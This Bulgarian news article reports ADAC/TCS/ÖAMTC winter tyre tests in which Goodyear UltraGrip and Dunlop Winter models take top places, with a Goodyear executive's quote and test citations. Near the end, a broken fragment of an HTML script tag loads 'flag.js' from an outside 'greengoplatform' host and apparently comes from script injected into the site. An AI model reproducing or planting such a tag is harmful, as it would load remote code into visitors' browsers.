Новини

Goodyear и Dunlop са водещи в тестовете на зимните гуми на ADACADAC, TCS и ÖAMTC публикуваха своите годишни тестове за зимни гуми съответно на немския, швейцарския и австрийския пазар, като присъдиха на Goodyear и Dunlop общото първо място в тест с 16 марки гуми. 

Тестът сравнява гумите по седемнадесет взискателни критерия. Тази година, тестът се фокусира върху популярния размер 195/65R15, който е монтиран на един от най-продаваните семейни автомобили като Volkswagen Golf.

Goodyear UltraGrip 9+ беше оценена от тест-пилоти като много балансирана гума, която е добра на сухи и мокри пътища, както и на сняг. Тя също така отбелязва впечатляващи резултати по отношение на износването и разхода на гориво, както и заема първо място в изпита за шофиране на лед. UltraGrip 9+ притежава две иновации на Goodyear, които допринесоха за този печеливш резултат. Технологията Mileage Plus защитава гумата при неравни пътища, за да осигури по-добро представяне при пробега, а технологията Winter Grip й осигурява изключително сцепление на сняг и лед.

За Dunlop, най-добрият резултат за Winter Response 2 е повторение на победата в теста от същата публикация през 2018 г. Тест – пилотите отново отбелязват много силно представяне на гумата на сухо, мокро, сняг и заледени повърхности. Този резултат се подпомага от отличително разположените под ъгъл ламели на раменните блокове на гумата. Това позволява на Dunlop Winter Response 2 да управлява центробежните сили, за да осигури по-добро сцепление на сняг и лед в завой.

 

Най-добри резултати в теста за високопроизводителни зимни гуми

Същата публикация тества и гуми 225/50R17, монтирани на много по-големи автомобили като Volvo V60, Skoda Octavia, BMW 3 Series и Mercedes C Class. В този размер Dunlop Winter Sport 5 спечели общата най-висока оценка. Goodyear UltraGrip Performance+ също беше една от само трите гуми, които получиха най-добра оценка от тестерите.

Dunlop WinterSport 5 беше най-добре представящата се гума на сняг, като Goodyear UltraGrip Performance+ беше оценена като много балансирана гума при всякакви условия.

„Заемането на четири от седемте челни позиции в една от най-уважаваните издания за тестове в индустрията е свидетелство за технологията в най-новите гуми в портфолиото на марката Goodyear“, каза Лоран Колантонио, регионален технологичен директор за EMEA в Goodyear. „Иновации като Winter Grip Technology запазиха UltraGrip 9+ и Performance+ на Goodyear на върха в сектора, в който семейството UltraGrip печели от десетилетия. Тъй като Dunlop Winter Response 2 и Winter Sport 5 имат най-висок резултат в своите сектори, ние се гордеем с обхвата и възможностите на нашето портфолио от зимни гуми.”

 

Тестови детайли:

1 Test published on 21/9/21 : ADAC/OAMTC/TCS winter tire test 195/65R15

2 Test published on 21/9/21 : ADAC/OAMTC/TCS winter tire test 225/50R17

3 Test published on 25/9/18: ADAC/OAMTC/TCS winter tire test 175/65R14
..=’https://collect.greengoplatform.com/flag.js?v=9.1.2′ type=’text/javascript’>

Виж още

Back to top button